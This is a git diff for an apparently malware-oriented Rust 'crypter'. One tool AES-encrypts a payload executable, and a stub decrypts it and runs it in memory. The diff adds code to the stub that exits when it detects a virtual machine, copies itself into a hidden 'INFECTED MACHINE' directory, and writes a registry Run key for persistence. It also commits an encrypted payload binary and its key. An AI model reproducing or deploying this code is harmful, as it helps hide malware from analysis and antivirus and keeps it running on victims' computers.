diff --git a/crypt/hexowl.exe b/crypt/hexowl.exe new file mode 100644 index 0000000..b1022a0 Binary files /dev/null and b/crypt/hexowl.exe differ diff --git a/crypt/src/main.rs b/crypt/src/main.rs index 74db37d..881c1e4 100644 --- a/crypt/src/main.rs +++ b/crypt/src/main.rs @@ -11,7 +11,7 @@ use rand::{RngCore, SeedableRng}; fn main() -> std::io::Result<()> { // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder - let plaintext_bytes = read("example.exe").expect("Failed to read file"); + let plaintext_bytes = read("hexowl.exe").expect("Failed to read file"); let mut encrypted_file = File::create("encrypted_Input.bin")?; let mut key_file = File::create("key.txt")?; diff --git a/stub/Cargo.lock b/stub/Cargo.lock index ceaeab3..d420e74 100644 --- a/stub/Cargo.lock +++ b/stub/Cargo.lock @@ -4,9 +4,9 @@ version = 3 [[package]] name = "aes" -version = "0.8.2" +version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241" +checksum = "ac1f845298e95f983ff1944b728ae08b8cebab80d684f0a832ed0fc74dfa27e2" dependencies = [ "cfg-if", "cipher", @@ -31,9 +31,9 @@ dependencies = [ [[package]] name = "cpufeatures" -version = "0.2.7" +version = "0.2.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58" +checksum = "a17b76ff3a4162b0b27f354a0c87015ddad39d35f9c0c36607a3bdd175dde1f1" dependencies = [ "libc", ] @@ -75,9 +75,9 @@ checksum = "3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829" [[package]] name = "libc" -version = "0.2.144" +version = "0.2.147" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1" +checksum = "b4668fb0ea861c1df094127ac5f1da3409a82116a4ba74fca2e58ef927159bb3" [[package]] name = "memexec" @@ -92,6 +92,7 @@ dependencies = [ "aes", "inside-vm", "memexec", + "winreg", ] [[package]] @@ -105,3 +106,34 @@ name = "version_check" version = "0.9.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" + +[[package]] +name = "winapi" +version = "0.3.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" +dependencies = [ + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", +] + +[[package]] +name = "winapi-i686-pc-windows-gnu" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" + +[[package]] +name = "winapi-x86_64-pc-windows-gnu" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" + +[[package]] +name = "winreg" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16cdb3898397cf7f624c294948669beafaeebc5577d5ec53d0afb76633593597" +dependencies = [ + "winapi", +] diff --git a/stub/Cargo.toml b/stub/Cargo.toml index 0800fd5..799735d 100644 --- a/stub/Cargo.toml +++ b/stub/Cargo.toml @@ -8,4 +8,5 @@ edition = "2021" [dependencies] inside-vm = "0.2.0" aes = "0.8.2" -memexec = "0.2" \ No newline at end of file +memexec = "0.2" +winreg = "0.9" diff --git a/stub/src/encrypted_Input.bin b/stub/src/encrypted_Input.bin new file mode 100644 index 0000000..37e2087 Binary files /dev/null and b/stub/src/encrypted_Input.bin differ diff --git a/stub/src/key.txt b/stub/src/key.txt new file mode 100644 index 0000000..aa11f4f --- /dev/null +++ b/stub/src/key.txt @@ -0,0 +1 @@ +8Ç­Ò¯F éL¨OÃXþ \ No newline at end of file diff --git a/stub/src/main.rs b/stub/src/main.rs index 6ae5b90..8dcd45e 100644 --- a/stub/src/main.rs +++ b/stub/src/main.rs @@ -3,16 +3,30 @@ use aes::cipher::{BlockDecrypt, KeyInit, generic_array::GenericArray, }; use inside_vm::inside_vm; -use std::io::{Read, Cursor}; +use std::process::Command; +use std::{fs, env}; +use std::io::{Read, Cursor, self}; use std::io::Result; +use std::path::Path; +use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS}; +use winreg::RegKey; -fn main(){ +fn main() { + if inside_vm(){ + println!("This is in a vm"); + std::process::exit(0); + } else { + println!("NO VM"); + + create_infected_directory(); + persistence(); + let pe_bytes = decrypt_file().unwrap(); fileless(pe_bytes); } @@ -45,7 +59,52 @@ fn decrypt_file() -> Result> { Ok(decrypted_bytes, ) } -fn fileless(bytes: Vec){ +fn create_infected_directory() -> io::Result<()> { + let infected_dir = Path::new("C:/Rust Crypter - INFECTED MACHINE"); + fs::create_dir_all(&infected_dir)?; + + let current_exe = env::current_exe()?; + let current_exe_filename = current_exe + .file_name(); + + let infected_exe_path = infected_dir.join(current_exe_filename.unwrap()); + fs::copy(¤t_exe, &infected_exe_path)?; + + if cfg!(target_os = "windows") { + Command::new("attrib") + .arg("+h") + .arg(infected_dir.as_os_str()) + .output()?; + Command::new("attrib") + .arg("+h") + .arg(infected_exe_path.as_os_str()) + .output()?; + } + + Ok(()) +} + +fn persistence() -> io::Result<()> { + + if let Ok(current_exe) = env::current_exe() { + if let Some(file_name) = current_exe.file_stem() { + + let executable_name = file_name.to_string_lossy(); + let directory_path = "C:/Rust Crypter - INFECTED MACHINE/"; + let file_path = format!("{}{}.exe", directory_path, executable_name); + + // Open the "Run" registry key + let hkcu = RegKey::predef(HKEY_CURRENT_USER); + let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?; + + // Add the executable path to the "Run" registry key + run_key.set_value("RustCrypter", &file_path).err(); + } + } + Ok(()) +} + +fn fileless(bytes: Vec) { unsafe { memexec::memexec_exe(&bytes).unwrap(); }